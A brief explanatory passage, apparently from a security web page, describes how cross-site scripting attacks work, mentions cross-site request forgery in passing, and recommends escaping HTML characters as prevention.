| Cross Site Scripting is probably the most common form of hacking and in this type; hackers use a legitimate site’s vulnerability to force that site to do certain things. In this attack, the hacker infects a web page with his malicious client-side script and when a user visits this page the script is downloaded to his browser and executed.
Once injected, the malicious code is stored in the site’s database and when it is displayed to the visitor, the resulting page can be distorted and code can also be run which steals cookies, or sends important information such as session ID to a malicious third-party website. If JavaScript is injected into the HTML source, then it can also be used for things such as redirecting users to a spam website or in a more sophisticated attack like keylogging (sending the user’s keystrokes to an external database). XSS is also used for user-account hacking and stealing the confidential information of users. A method used in conjunction with XSS is known as Cross-Site Request forgery. This is where, malicious code tricks the users’ browser to send requests under the guise of legitimate user, so The best way to prevent XSS is to use escape functions, specifically to escape characters that comprise HTML and JavaScript syntax like ‘>’ and ‘<’ or to convert these into HTML entities. |